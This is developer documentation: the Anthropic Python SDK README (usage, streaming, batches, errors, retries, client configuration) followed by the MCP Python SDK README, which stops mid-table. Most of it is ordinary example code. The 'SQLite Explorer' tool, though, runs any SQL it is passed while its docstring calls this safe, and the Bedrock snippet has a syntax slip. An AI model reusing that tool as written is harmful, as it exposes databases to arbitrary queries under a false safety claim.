Python SDK README: +``` +# Anthropic Python API library + +[![PyPI version](https://img.shields.io/pypi/v/anthropic.svg)](https://pypi.org/project/anthropic/) + +The Anthropic Python library provides convenient access to the Anthropic REST API from any Python 3.8+ +application. It includes type definitions for all request params and response fields, +and offers both synchronous and asynchronous clients powered by [httpx](https://github.com/encode/httpx). + +## Documentation + +The REST API documentation can be found on [docs.anthropic.com](https://docs.anthropic.com/claude/reference/). The full API of this library can be found in [api.md](api.md). + +## Installation + +```sh +# install from PyPI +pip install anthropic +``` + +## Usage + +The full API of this library can be found in [api.md](api.md). + +```python +import os +from anthropic import Anthropic + +client = Anthropic( + api_key=os.environ.get("ANTHROPIC_API_KEY"), # This is the default and can be omitted +) + +message = client.messages.create( + max_tokens=1024, + messages=[ + { + "role": "user", + "content": "Hello, Claude", + } + ], + model="claude-3-5-sonnet-latest", +) +print(message.content) +``` + +While you can provide an `api_key` keyword argument, +we recommend using [python-dotenv](https://pypi.org/project/python-dotenv/) +to add `ANTHROPIC_API_KEY="my-anthropic-api-key"` to your `.env` file +so that your API Key is not stored in source control. + +## Async usage + +Simply import `AsyncAnthropic` instead of `Anthropic` and use `await` with each API call: + +```python +import os +import asyncio +from anthropic import AsyncAnthropic + +client = AsyncAnthropic( + api_key=os.environ.get("ANTHROPIC_API_KEY"), # This is the default and can be omitted +) + + +async def main() -> None: + message = await client.messages.create( + max_tokens=1024, + messages=[ + { + "role": "user", + "content": "Hello, Claude", + } + ], + model="claude-3-5-sonnet-latest", + ) + print(message.content) + + +asyncio.run(main()) +``` + +Functionality between the synchronous and asynchronous clients is otherwise identical. + +## Streaming responses + +We provide support for streaming responses using Server Side Events (SSE). + +```python +from anthropic import Anthropic + +client = Anthropic() + +stream = client.messages.create( + max_tokens=1024, + messages=[ + { + "role": "user", + "content": "Hello, Claude", + } + ], + model="claude-3-5-sonnet-latest", + stream=True, +) +for event in stream: + print(event.type) +``` + +The async client uses the exact same interface. + +```python +from anthropic import AsyncAnthropic + +client = AsyncAnthropic() + +stream = await client.messages.create( + max_tokens=1024, + messages=[ + { + "role": "user", + "content": "Hello, Claude", + } + ], + model="claude-3-5-sonnet-latest", + stream=True, +) +async for event in stream: + print(event.type) +``` + +### Streaming Helpers + +This library provides several conveniences for streaming messages, for example: + +```py +import asyncio +from anthropic import AsyncAnthropic + +client = AsyncAnthropic() + +async def main() -> None: + async with client.messages.stream( + max_tokens=1024, + messages=[ + { + "role": "user", + "content": "Say hello there!", + } + ], + model="claude-3-5-sonnet-latest", + ) as stream: + async for text in stream.text_stream: + print(text, end="", flush=True) + print() + + message = await stream.get_final_message() + print(message.to_json()) + +asyncio.run(main()) +``` + +Streaming with `client.messages.stream(...)` exposes [various helpers for your convenience](helpers.md) including accumulation & SDK-specific events. + +Alternatively, you can use `client.messages.create(..., stream=True)` which only returns an async iterable of the events in the stream and thus uses less memory (it does not build up a final message object for you). + +## Token counting + +To get the token count for a message without creating it you can use the `client.beta.messages.count_tokens()` method. This takes the same `messages` list as the `.create()` method. + +```py +count = client.beta.messages.count_tokens( + model="claude-3-5-sonnet-20241022", + messages=[ + {"role": "user", "content": "Hello, world"} + ] +) +count.input_tokens # 10 +``` + +You can also see the exact usage for a given request through the `usage` response property, e.g. + +```py +message = client.messages.create(...) +message.usage +# Usage(input_tokens=25, output_tokens=13) +``` + +## Message Batches + +This SDK provides beta support for the [Message Batches API](https://docs.anthropic.com/en/docs/build-with-claude/message-batches) under the `client.beta.messages.batches` namespace. + + +### Creating a batch + +Message Batches take the exact same request params as the standard Messages API: + +```python +await client.beta.messages.batches.create( + requests=[ + { + "custom_id": "my-first-request", + "params": { + "model": "claude-3-5-sonnet-latest", + "max_tokens": 1024, + "messages": [{"role": "user", "content": "Hello, world"}], + }, + }, + { + "custom_id": "my-second-request", + "params": { + "model": "claude-3-5-sonnet-latest", + "max_tokens": 1024, + "messages": [{"role": "user", "content": "Hi again, friend"}], + }, + }, + ] +) +``` + + +### Getting results from a batch + +Once a Message Batch has been processed, indicated by `.processing_status === 'ended'`, you can access the results with `.batches.results()` + +```python +result_stream = await client.beta.messages.batches.results(batch_id) +async for entry in result_stream: + if entry.result.type == "succeeded": + print(entry.result.message.content) +``` + +## Tool use + +This SDK provides support for tool use, aka function calling. More details can be found in [the documentation](https://docs.anthropic.com/claude/docs/tool-use). + +## AWS Bedrock + +This library also provides support for the [Anthropic Bedrock API](https://aws.amazon.com/bedrock/claude/) if you install this library with the `bedrock` extra, e.g. `pip install -U anthropic[bedrock]`. + +You can then import and instantiate a separate `AnthropicBedrock` class, the rest of the API is the same. + +```py +from anthropic import AnthropicBedrock + +client = AnthropicBedrock() + +message = client.messages.create( + max_tokens=1024, + messages=[ + { + "role": "user", + "content": "Hello!", + } + ], + model="anthropic.claude-3-5-sonnet-20241022-v2:0", +) +print(message) +``` + +The bedrock client supports the following arguments for authentication + +```py +AnthropicBedrock( + aws_profile='...', + aws_region='us-east' + aws_secret_key='...', + aws_access_key='...', + aws_session_token='...', +) +``` + +For a more fully fledged example see [`examples/bedrock.py`](https://github.com/anthropics/anthropic-sdk-python/blob/main/examples/bedrock.py). + +## Google Vertex + +This library also provides support for the [Anthropic Vertex API](https://cloud.google.com/vertex-ai?hl=en) if you install this library with the `vertex` extra, e.g. `pip install -U anthropic[vertex]`. + +You can then import and instantiate a separate `AnthropicVertex`/`AsyncAnthropicVertex` class, which has the same API as the base `Anthropic`/`AsyncAnthropic` class. + +```py +from anthropic import AnthropicVertex + +client = AnthropicVertex() + +message = client.messages.create( + model="claude-3-5-sonnet-v2@20241022", + max_tokens=100, + messages=[ + { + "role": "user", + "content": "Hello!", + } + ], +) +print(message) +``` + +For a more complete example see [`examples/vertex.py`](https://github.com/anthropics/anthropic-sdk-python/blob/main/examples/vertex.py). + +## Using types + +Nested request parameters are [TypedDicts](https://docs.python.org/3/library/typing.html#typing.TypedDict). Responses are [Pydantic models](https://docs.pydantic.dev) which also provide helper methods for things like: + +- Serializing back into JSON, `model.to_json()` +- Converting to a dictionary, `model.to_dict()` + +Typed requests and responses provide autocomplete and documentation within your editor. If you would like to see type errors in VS Code to help catch bugs earlier, set `python.analysis.typeCheckingMode` to `basic`. + +## Pagination + +List methods in the Anthropic API are paginated. + +This library provides auto-paginating iterators with each list response, so you do not have to request successive pages manually: + +```python +from anthropic import Anthropic + +client = Anthropic() + +all_batches = [] +# Automatically fetches more pages as needed. +for batch in client.beta.messages.batches.list( + limit=20, +): + # Do something with batch here + all_batches.append(batch) +print(all_batches) +``` + +Or, asynchronously: + +```python +import asyncio +from anthropic import AsyncAnthropic + +client = AsyncAnthropic() + + +async def main() -> None: + all_batches = [] + # Iterate through items across all pages, issuing requests as needed. + async for batch in client.beta.messages.batches.list( + limit=20, + ): + all_batches.append(batch) + print(all_batches) + + +asyncio.run(main()) +``` + +Alternatively, you can use the `.has_next_page()`, `.next_page_info()`, or `.get_next_page()` methods for more granular control working with pages: + +```python +first_page = await client.beta.messages.batches.list( + limit=20, +) +if first_page.has_next_page(): + print(f"will fetch next page using these details: {first_page.next_page_info()}") + next_page = await first_page.get_next_page() + print(f"number of items we just fetched: {len(next_page.data)}") + +# Remove `await` for non-async usage. +``` + +Or just work directly with the returned data: + +```python +first_page = await client.beta.messages.batches.list( + limit=20, +) + +print(f"next page cursor: {first_page.last_id}") # => "next page cursor: ..." +for batch in first_page.data: + print(batch.id) + +# Remove `await` for non-async usage. +``` + +## Handling errors + +When the library is unable to connect to the API (for example, due to network connection problems or a timeout), a subclass of `anthropic.APIConnectionError` is raised. + +When the API returns a non-success status code (that is, 4xx or 5xx +response), a subclass of `anthropic.APIStatusError` is raised, containing `status_code` and `response` properties. + +All errors inherit from `anthropic.APIError`. + +```python +import anthropic +from anthropic import Anthropic + +client = Anthropic() + +try: + client.messages.create( + max_tokens=1024, + messages=[ + { + "role": "user", + "content": "Hello, Claude", + } + ], + model="claude-3-5-sonnet-latest", + ) +except anthropic.APIConnectionError as e: + print("The server could not be reached") + print(e.__cause__) # an underlying Exception, likely raised within httpx. +except anthropic.RateLimitError as e: + print("A 429 status code was received; we should back off a bit.") +except anthropic.APIStatusError as e: + print("Another non-200-range status code was received") + print(e.status_code) + print(e.response) +``` + +Error codes are as follows: + +| Status Code | Error Type | +| ----------- | -------------------------- | +| 400 | `BadRequestError` | +| 401 | `AuthenticationError` | +| 403 | `PermissionDeniedError` | +| 404 | `NotFoundError` | +| 422 | `UnprocessableEntityError` | +| 429 | `RateLimitError` | +| >=500 | `InternalServerError` | +| N/A | `APIConnectionError` | + +## Request IDs + +> For more information on debugging requests, see [these docs](https://docs.anthropic.com/en/api/errors#request-id) + +All object responses in the SDK provide a `_request_id` property which is added from the `request-id` response header so that you can quickly log failing requests and report them back to Anthropic. + +```python +message = client.messages.create( + max_tokens=1024, + messages=[ + { + "role": "user", + "content": "Hello, Claude", + } + ], + model="claude-3-5-sonnet-latest", +) +print(message._request_id) # req_018EeWyXxfu5pfWkrYcMdjWG +``` + +Note that unlike other properties that use an `_` prefix, the `_request_id` property +*is* public. Unless documented otherwise, *all* other `_` prefix properties, +methods and modules are *private*. + +### Retries + +Certain errors are automatically retried 2 times by default, with a short exponential backoff. +Connection errors (for example, due to a network connectivity problem), 408 Request Timeout, 409 Conflict, +429 Rate Limit, and >=500 Internal errors are all retried by default. + +You can use the `max_retries` option to configure or disable retry settings: + +```python +from anthropic import Anthropic + +# Configure the default for all requests: +client = Anthropic( + # default is 2 + max_retries=0, +) + +# Or, configure per-request: +client.with_options(max_retries=5).messages.create( + max_tokens=1024, + messages=[ + { + "role": "user", + "content": "Hello, Claude", + } + ], + model="claude-3-5-sonnet-latest", +) +``` + +### Timeouts + +By default requests time out after 10 minutes. You can configure this with a `timeout` option, +which accepts a float or an [`httpx.Timeout`](https://www.python-httpx.org/advanced/timeouts/#fine-tuning-the-configuration) object: + +```python +from anthropic import Anthropic + +# Configure the default for all requests: +client = Anthropic( + # 20 seconds (default is 10 minutes) + timeout=20.0, +) + +# More granular control: +client = Anthropic( + timeout=httpx.Timeout(60.0, read=5.0, write=10.0, connect=2.0), +) + +# Override per-request: +client.with_options(timeout=5.0).messages.create( + max_tokens=1024, + messages=[ + { + "role": "user", + "content": "Hello, Claude", + } + ], + model="claude-3-5-sonnet-latest", +) +``` + +On timeout, an `APITimeoutError` is thrown. + +Note that requests that time out are [retried twice by default](#retries). + +### Long Requests + +> [!IMPORTANT] +> We highly encourage you use the streaming [Messages API](#streaming-responses) for longer running requests. + +We do not recommend setting a large `max_tokens` values without using streaming. +Some networks may drop idle connections after a certain period of time, which +can cause the request to fail or [timeout](#timeouts) without receiving a response from Anthropic. + +This SDK will also throw a `ValueError` if a non-streaming request is expected to be above roughly 10 minutes long. +Passing `stream=True` or [overriding](#timeouts) the `timeout` option at the client or request level disables this error. + +An expected request latency longer than the [timeout](#timeouts) for a non-streaming request +will result in the client terminating the connection and retrying without receiving a response. + +We set a [TCP socket keep-alive](https://tldp.org/HOWTO/TCP-Keepalive-HOWTO/overview.html) option in order +to reduce the impact of idle connection timeouts on some networks. +This can be [overridden](#Configuring-the-HTTP-client) by passing a `http_client` option to the client. + +## Default Headers + +We automatically send the `anthropic-version` header set to `2023-06-01`. + +If you need to, you can override it by setting default headers per-request or on the client object. + +Be aware that doing so may result in incorrect types and other unexpected or undefined behavior in the SDK. + +```python +from anthropic import Anthropic + +client = Anthropic( + default_headers={"anthropic-version": "My-Custom-Value"}, +) +``` + +## Advanced + +### Logging + +We use the standard library [`logging`](https://docs.python.org/3/library/logging.html) module. + +You can enable logging by setting the environment variable `ANTHROPIC_LOG` to `info`. + +```shell +$ export ANTHROPIC_LOG=info +``` + +Or to `debug` for more verbose logging. + +### How to tell whether `None` means `null` or missing + +In an API response, a field may be explicitly `null`, or missing entirely; in either case, its value is `None` in this library. You can differentiate the two cases with `.model_fields_set`: + +```py +if response.my_field is None: + if 'my_field' not in response.model_fields_set: + print('Got json like {}, without a "my_field" key present at all.') + else: + print('Got json like {"my_field": null}.') +``` + +### Accessing raw response data (e.g. headers) + +The "raw" Response object can be accessed by prefixing `.with_raw_response.` to any HTTP method call, e.g., + +```py +from anthropic import Anthropic + +client = Anthropic() +response = client.messages.with_raw_response.create( + max_tokens=1024, + messages=[{ + "role": "user", + "content": "Hello, Claude", + }], + model="claude-3-5-sonnet-latest", +) +print(response.headers.get('X-My-Header')) + +message = response.parse() # get the object that `messages.create()` would have returned +print(message.content) +``` + +These methods return a [`LegacyAPIResponse`](https://github.com/anthropics/anthropic-sdk-python/tree/main/src/anthropic/_legacy_response.py) object. This is a legacy class as we're changing it slightly in the next major version. + +For the sync client this will mostly be the same with the exception +of `content` & `text` will be methods instead of properties. In the +async client, all methods will be async. + +A migration script will be provided & the migration in general should +be smooth. + +#### `.with_streaming_response` + +The above interface eagerly reads the full response body when you make the request, which may not always be what you want. + +To stream the response body, use `.with_streaming_response` instead, which requires a context manager and only reads the response body once you call `.read()`, `.text()`, `.json()`, `.iter_bytes()`, `.iter_text()`, `.iter_lines()` or `.parse()`. In the async client, these are async methods. + +As such, `.with_streaming_response` methods return a different [`APIResponse`](https://github.com/anthropics/anthropic-sdk-python/tree/main/src/anthropic/_response.py) object, and the async client returns an [`AsyncAPIResponse`](https://github.com/anthropics/anthropic-sdk-python/tree/main/src/anthropic/_response.py) object. + +```python +with client.messages.with_streaming_response.create( + max_tokens=1024, + messages=[ + { + "role": "user", + "content": "Hello, Claude", + } + ], + model="claude-3-5-sonnet-latest", +) as response: + print(response.headers.get("X-My-Header")) + + for line in response.iter_lines(): + print(line) +``` + +The context manager is required so that the response will reliably be closed. + +### Making custom/undocumented requests + +This library is typed for convenient access to the documented API. + +If you need to access undocumented endpoints, params, or response properties, the library can still be used. + +#### Undocumented endpoints + +To make requests to undocumented endpoints, you can make requests using `client.get`, `client.post`, and other +http verbs. Options on the client will be respected (such as retries) when making this request. + +```py +import httpx + +response = client.post( + "/foo", + cast_to=httpx.Response, + body={"my_param": True}, +) + +print(response.headers.get("x-foo")) +``` + +#### Undocumented request params + +If you want to explicitly send an extra param, you can do so with the `extra_query`, `extra_body`, and `extra_headers` request +options. + +#### Undocumented response properties + +To access undocumented response properties, you can access the extra fields like `response.unknown_prop`. You +can also get all the extra fields on the Pydantic model as a dict with +[`response.model_extra`](https://docs.pydantic.dev/latest/api/base_model/#pydantic.BaseModel.model_extra). + +### Configuring the HTTP client + +You can directly override the [httpx client](https://www.python-httpx.org/api/#client) to customize it for your use case, including: + +- Support for [proxies](https://www.python-httpx.org/advanced/proxies/) +- Custom [transports](https://www.python-httpx.org/advanced/transports/) +- Additional [advanced](https://www.python-httpx.org/advanced/clients/) functionality + +```python +import httpx +from anthropic import Anthropic, DefaultHttpxClient + +client = Anthropic( + # Or use the `ANTHROPIC_BASE_URL` env var + base_url="http://my.test.server.example.com:8083", + http_client=DefaultHttpxClient( + proxy="http://my.test.proxy.example.com", + transport=httpx.HTTPTransport(local_address="0.0.0.0"), + ), +) +``` + +You can also customize the client on a per-request basis by using `with_options()`: + +```python +client.with_options(http_client=DefaultHttpxClient(...)) +``` + +### Managing HTTP resources + +By default the library closes underlying HTTP connections whenever the client is [garbage collected](https://docs.python.org/3/reference/datamodel.html#object.__del__). You can manually close the client using the `.close()` method if desired, or with a context manager that closes when exiting. + +```py +from anthropic import Anthropic + +with Anthropic() as client: + # make requests here + ... + +# HTTP client is now closed +``` + +## Versioning + +This package generally follows [SemVer](https://semver.org/spec/v2.0.0.html) conventions, though certain backwards-incompatible changes may be released as minor versions: + +1. Changes that only affect static types, without breaking runtime behavior. +2. Changes to library internals which are technically public but not intended or documented for external use. _(Please open a GitHub issue to let us know if you are relying on such internals.)_ +3. Changes that we do not expect to impact the vast majority of users in practice. + +We take backwards-compatibility seriously and work hard to ensure you can rely on a smooth upgrade experience. + +We are keen for your feedback; please open an [issue](https://www.github.com/anthropics/anthropic-sdk-python/issues) with questions, bugs, or suggestions. + +### Determining the installed version + +If you've upgraded to the latest version but aren't seeing any new features you were expecting then your python environment is likely still using an older version. + +You can determine the version that is being used at runtime with: + +```py +import anthropic +print(anthropic.__version__) +``` + +## Requirements + +Python 3.8 or higher. + +## Contributing + +See [the contributing documentation](./CONTRIBUTING.md). +``` + + +MCP Python SDK README: +# MCP Python SDK + +
+ +Python implementation of the Model Context Protocol (MCP) + +[![PyPI][pypi-badge]][pypi-url] +[![MIT licensed][mit-badge]][mit-url] +[![Python Version][python-badge]][python-url] +[![Documentation][docs-badge]][docs-url] +[![Specification][spec-badge]][spec-url] +[![GitHub Discussions][discussions-badge]][discussions-url] + +
+ + +## Table of Contents + +- [MCP Python SDK](#mcp-python-sdk) + - [Overview](#overview) + - [Installation](#installation) + - [Adding MCP to your python project](#adding-mcp-to-your-python-project) + - [Running the standalone MCP development tools](#running-the-standalone-mcp-development-tools) + - [Quickstart](#quickstart) + - [What is MCP?](#what-is-mcp) + - [Core Concepts](#core-concepts) + - [Server](#server) + - [Resources](#resources) + - [Tools](#tools) + - [Prompts](#prompts) + - [Images](#images) + - [Context](#context) + - [Running Your Server](#running-your-server) + - [Development Mode](#development-mode) + - [Claude Desktop Integration](#claude-desktop-integration) + - [Direct Execution](#direct-execution) + - [Mounting to an Existing ASGI Server](#mounting-to-an-existing-asgi-server) + - [Examples](#examples) + - [Echo Server](#echo-server) + - [SQLite Explorer](#sqlite-explorer) + - [Advanced Usage](#advanced-usage) + - [Low-Level Server](#low-level-server) + - [Writing MCP Clients](#writing-mcp-clients) + - [MCP Primitives](#mcp-primitives) + - [Server Capabilities](#server-capabilities) + - [Documentation](#documentation) + - [Contributing](#contributing) + - [License](#license) + +[pypi-badge]: https://img.shields.io/pypi/v/mcp.svg +[pypi-url]: https://pypi.org/project/mcp/ +[mit-badge]: https://img.shields.io/pypi/l/mcp.svg +[mit-url]: https://github.com/modelcontextprotocol/python-sdk/blob/main/LICENSE +[python-badge]: https://img.shields.io/pypi/pyversions/mcp.svg +[python-url]: https://www.python.org/downloads/ +[docs-badge]: https://img.shields.io/badge/docs-modelcontextprotocol.io-blue.svg +[docs-url]: https://modelcontextprotocol.io +[spec-badge]: https://img.shields.io/badge/spec-spec.modelcontextprotocol.io-blue.svg +[spec-url]: https://spec.modelcontextprotocol.io +[discussions-badge]: https://img.shields.io/github/discussions/modelcontextprotocol/python-sdk +[discussions-url]: https://github.com/modelcontextprotocol/python-sdk/discussions + +## Overview + +The Model Context Protocol allows applications to provide context for LLMs in a standardized way, separating the concerns of providing context from the actual LLM interaction. This Python SDK implements the full MCP specification, making it easy to: + +- Build MCP clients that can connect to any MCP server +- Create MCP servers that expose resources, prompts and tools +- Use standard transports like stdio and SSE +- Handle all MCP protocol messages and lifecycle events + +## Installation + +### Adding MCP to your python project + +We recommend using [uv](https://docs.astral.sh/uv/) to manage your Python projects. + +If you haven't created a uv-managed project yet, create one: + + ```bash + uv init mcp-server-demo + cd mcp-server-demo + ``` + + Then add MCP to your project dependencies: + + ```bash + uv add "mcp[cli]" + ``` + +Alternatively, for projects using pip for dependencies: +```bash +pip install "mcp[cli]" +``` + +### Running the standalone MCP development tools + +To run the mcp command with uv: + +```bash +uv run mcp +``` + +## Quickstart + +Let's create a simple MCP server that exposes a calculator tool and some data: + +```python +# server.py +from mcp.server.fastmcp import FastMCP + +# Create an MCP server +mcp = FastMCP("Demo") + + +# Add an addition tool +@mcp.tool() +def add(a: int, b: int) -> int: + """Add two numbers""" + return a + b + + +# Add a dynamic greeting resource +@mcp.resource("greeting://{name}") +def get_greeting(name: str) -> str: + """Get a personalized greeting""" + return f"Hello, {name}!" +``` + +You can install this server in [Claude Desktop](https://claude.ai/download) and interact with it right away by running: +```bash +mcp install server.py +``` + +Alternatively, you can test it with the MCP Inspector: +```bash +mcp dev server.py +``` + +## What is MCP? + +The [Model Context Protocol (MCP)](https://modelcontextprotocol.io) lets you build servers that expose data and functionality to LLM applications in a secure, standardized way. Think of it like a web API, but specifically designed for LLM interactions. MCP servers can: + +- Expose data through **Resources** (think of these sort of like GET endpoints; they are used to load information into the LLM's context) +- Provide functionality through **Tools** (sort of like POST endpoints; they are used to execute code or otherwise produce a side effect) +- Define interaction patterns through **Prompts** (reusable templates for LLM interactions) +- And more! + +## Core Concepts + +### Server + +The FastMCP server is your core interface to the MCP protocol. It handles connection management, protocol compliance, and message routing: + +```python +# Add lifespan support for startup/shutdown with strong typing +from contextlib import asynccontextmanager +from collections.abc import AsyncIterator +from dataclasses import dataclass + +from fake_database import Database # Replace with your actual DB type + +from mcp.server.fastmcp import Context, FastMCP + +# Create a named server +mcp = FastMCP("My App") + +# Specify dependencies for deployment and development +mcp = FastMCP("My App", dependencies=["pandas", "numpy"]) + + +@dataclass +class AppContext: + db: Database + + +@asynccontextmanager +async def app_lifespan(server: FastMCP) -> AsyncIterator[AppContext]: + """Manage application lifecycle with type-safe context""" + # Initialize on startup + db = await Database.connect() + try: + yield AppContext(db=db) + finally: + # Cleanup on shutdown + await db.disconnect() + + +# Pass lifespan to server +mcp = FastMCP("My App", lifespan=app_lifespan) + + +# Access type-safe lifespan context in tools +@mcp.tool() +def query_db(ctx: Context) -> str: + """Tool that uses initialized resources""" + db = ctx.request_context.lifespan_context["db"] + return db.query() +``` + +### Resources + +Resources are how you expose data to LLMs. They're similar to GET endpoints in a REST API - they provide data but shouldn't perform significant computation or have side effects: + +```python +from mcp.server.fastmcp import FastMCP + +mcp = FastMCP("My App") + + +@mcp.resource("config://app") +def get_config() -> str: + """Static configuration data""" + return "App configuration here" + + +@mcp.resource("users://{user_id}/profile") +def get_user_profile(user_id: str) -> str: + """Dynamic user data""" + return f"Profile data for user {user_id}" +``` + +### Tools + +Tools let LLMs take actions through your server. Unlike resources, tools are expected to perform computation and have side effects: + +```python +import httpx +from mcp.server.fastmcp import FastMCP + +mcp = FastMCP("My App") + + +@mcp.tool() +def calculate_bmi(weight_kg: float, height_m: float) -> float: + """Calculate BMI given weight in kg and height in meters""" + return weight_kg / (height_m**2) + + +@mcp.tool() +async def fetch_weather(city: str) -> str: + """Fetch current weather for a city""" + async with httpx.AsyncClient() as client: + response = await client.get(f"https://api.weather.com/{city}") + return response.text +``` + +### Prompts + +Prompts are reusable templates that help LLMs interact with your server effectively: + +```python +from mcp.server.fastmcp import FastMCP +from mcp.server.fastmcp.prompts import base + +mcp = FastMCP("My App") + + +@mcp.prompt() +def review_code(code: str) -> str: + return f"Please review this code:\n\n{code}" + + +@mcp.prompt() +def debug_error(error: str) -> list[base.Message]: + return [ + base.UserMessage("I'm seeing this error:"), + base.UserMessage(error), + base.AssistantMessage("I'll help debug that. What have you tried so far?"), + ] +``` + +### Images + +FastMCP provides an `Image` class that automatically handles image data: + +```python +from mcp.server.fastmcp import FastMCP, Image +from PIL import Image as PILImage + +mcp = FastMCP("My App") + + +@mcp.tool() +def create_thumbnail(image_path: str) -> Image: + """Create a thumbnail from an image""" + img = PILImage.open(image_path) + img.thumbnail((100, 100)) + return Image(data=img.tobytes(), format="png") +``` + +### Context + +The Context object gives your tools and resources access to MCP capabilities: + +```python +from mcp.server.fastmcp import FastMCP, Context + +mcp = FastMCP("My App") + + +@mcp.tool() +async def long_task(files: list[str], ctx: Context) -> str: + """Process multiple files with progress tracking""" + for i, file in enumerate(files): + ctx.info(f"Processing {file}") + await ctx.report_progress(i, len(files)) + data, mime_type = await ctx.read_resource(f"file://{file}") + return "Processing complete" +``` + +## Running Your Server + +### Development Mode + +The fastest way to test and debug your server is with the MCP Inspector: + +```bash +mcp dev server.py + +# Add dependencies +mcp dev server.py --with pandas --with numpy + +# Mount local code +mcp dev server.py --with-editable . +``` + +### Claude Desktop Integration + +Once your server is ready, install it in Claude Desktop: + +```bash +mcp install server.py + +# Custom name +mcp install server.py --name "My Analytics Server" + +# Environment variables +mcp install server.py -v API_KEY=abc123 -v DB_URL=postgres://... +mcp install server.py -f .env +``` + +### Direct Execution + +For advanced scenarios like custom deployments: + +```python +from mcp.server.fastmcp import FastMCP + +mcp = FastMCP("My App") + +if __name__ == "__main__": + mcp.run() +``` + +Run it with: +```bash +python server.py +# or +mcp run server.py +``` + +### Mounting to an Existing ASGI Server + +You can mount the SSE server to an existing ASGI server using the `sse_app` method. This allows you to integrate the SSE server with other ASGI applications. + +```python +from starlette.applications import Starlette +from starlette.routing import Mount, Host +from mcp.server.fastmcp import FastMCP + + +mcp = FastMCP("My App") + +# Mount the SSE server to the existing ASGI server +app = Starlette( + routes=[ + Mount('/', app=mcp.sse_app()), + ] +) + +# or dynamically mount as host +app.router.routes.append(Host('mcp.acme.corp', app=mcp.sse_app())) +``` + +For more information on mounting applications in Starlette, see the [Starlette documentation](https://www.starlette.io/routing/#submounting-routes). + +## Examples + +### Echo Server + +A simple server demonstrating resources, tools, and prompts: + +```python +from mcp.server.fastmcp import FastMCP + +mcp = FastMCP("Echo") + + +@mcp.resource("echo://{message}") +def echo_resource(message: str) -> str: + """Echo a message as a resource""" + return f"Resource echo: {message}" + + +@mcp.tool() +def echo_tool(message: str) -> str: + """Echo a message as a tool""" + return f"Tool echo: {message}" + + +@mcp.prompt() +def echo_prompt(message: str) -> str: + """Create an echo prompt""" + return f"Please process this message: {message}" +``` + +### SQLite Explorer + +A more complex example showing database integration: + +```python +import sqlite3 + +from mcp.server.fastmcp import FastMCP + +mcp = FastMCP("SQLite Explorer") + + +@mcp.resource("schema://main") +def get_schema() -> str: + """Provide the database schema as a resource""" + conn = sqlite3.connect("database.db") + schema = conn.execute("SELECT sql FROM sqlite_master WHERE type='table'").fetchall() + return "\n".join(sql[0] for sql in schema if sql[0]) + + +@mcp.tool() +def query_data(sql: str) -> str: + """Execute SQL queries safely""" + conn = sqlite3.connect("database.db") + try: + result = conn.execute(sql).fetchall() + return "\n".join(str(row) for row in result) + except Exception as e: + return f"Error: {str(e)}" +``` + +## Advanced Usage + +### Low-Level Server + +For more control, you can use the low-level server implementation directly. This gives you full access to the protocol and allows you to customize every aspect of your server, including lifecycle management through the lifespan API: + +```python +from contextlib import asynccontextmanager +from collections.abc import AsyncIterator + +from fake_database import Database # Replace with your actual DB type + +from mcp.server import Server + + +@asynccontextmanager +async def server_lifespan(server: Server) -> AsyncIterator[dict]: + """Manage server startup and shutdown lifecycle.""" + # Initialize resources on startup + db = await Database.connect() + try: + yield {"db": db} + finally: + # Clean up on shutdown + await db.disconnect() + + +# Pass lifespan to server +server = Server("example-server", lifespan=server_lifespan) + + +# Access lifespan context in handlers +@server.call_tool() +async def query_db(name: str, arguments: dict) -> list: + ctx = server.request_context + db = ctx.lifespan_context["db"] + return await db.query(arguments["query"]) +``` + +The lifespan API provides: +- A way to initialize resources when the server starts and clean them up when it stops +- Access to initialized resources through the request context in handlers +- Type-safe context passing between lifespan and request handlers + +```python +import mcp.server.stdio +import mcp.types as types +from mcp.server.lowlevel import NotificationOptions, Server +from mcp.server.models import InitializationOptions + +# Create a server instance +server = Server("example-server") + + +@server.list_prompts() +async def handle_list_prompts() -> list[types.Prompt]: + return [ + types.Prompt( + name="example-prompt", + description="An example prompt template", + arguments=[ + types.PromptArgument( + name="arg1", description="Example argument", required=True + ) + ], + ) + ] + + +@server.get_prompt() +async def handle_get_prompt( + name: str, arguments: dict[str, str] | None +) -> types.GetPromptResult: + if name != "example-prompt": + raise ValueError(f"Unknown prompt: {name}") + + return types.GetPromptResult( + description="Example prompt", + messages=[ + types.PromptMessage( + role="user", + content=types.TextContent(type="text", text="Example prompt text"), + ) + ], + ) + + +async def run(): + async with mcp.server.stdio.stdio_server() as (read_stream, write_stream): + await server.run( + read_stream, + write_stream, + InitializationOptions( + server_name="example", + server_version="0.1.0", + capabilities=server.get_capabilities( + notification_options=NotificationOptions(), + experimental_capabilities={}, + ), + ), + ) + + +if __name__ == "__main__": + import asyncio + + asyncio.run(run()) +``` + +### Writing MCP Clients + +The SDK provides a high-level client interface for connecting to MCP servers: + +```python +from mcp import ClientSession, StdioServerParameters, types +from mcp.client.stdio import stdio_client + +# Create server parameters for stdio connection +server_params = StdioServerParameters( + command="python", # Executable + args=["example_server.py"], # Optional command line arguments + env=None, # Optional environment variables +) + + +# Optional: create a sampling callback +async def handle_sampling_message( + message: types.CreateMessageRequestParams, +) -> types.CreateMessageResult: + return types.CreateMessageResult( + role="assistant", + content=types.TextContent( + type="text", + text="Hello, world! from model", + ), + model="gpt-3.5-turbo", + stopReason="endTurn", + ) + + +async def run(): + async with stdio_client(server_params) as (read, write): + async with ClientSession( + read, write, sampling_callback=handle_sampling_message + ) as session: + # Initialize the connection + await session.initialize() + + # List available prompts + prompts = await session.list_prompts() + + # Get a prompt + prompt = await session.get_prompt( + "example-prompt", arguments={"arg1": "value"} + ) + + # List available resources + resources = await session.list_resources() + + # List available tools + tools = await session.list_tools() + + # Read a resource + content, mime_type = await session.read_resource("file://some/path") + + # Call a tool + result = await session.call_tool("tool-name", arguments={"arg1": "value"}) + + +if __name__ == "__main__": + import asyncio + + asyncio.run(run()) +``` + +### MCP Primitives + +The MCP protocol defines three core primitives that servers can implement: + +| Primitive | Control | Description | Example Use | +|-----------|-----------------------|-----------------------------------------------------|------------------------------| +| Prompts | User-controlled | Interactive templates invoked by user choice | Slash commands, menu options | +| Resources | Application-controlled| Contextual data managed by the client application | File contents, API responses | +| Tools | Model-controlled | Functions exposed to the LLM to take actions | API calls, data updates | + +### Server Capabilities + +MCP servers declare capabilities during initialization: + +| Capability | Feature Flag | Description | +|-------------|------------------------------|------------------------------------| +| `prompts` | `listChanged` | Prompt template management | +| `resources` | `subscribe`
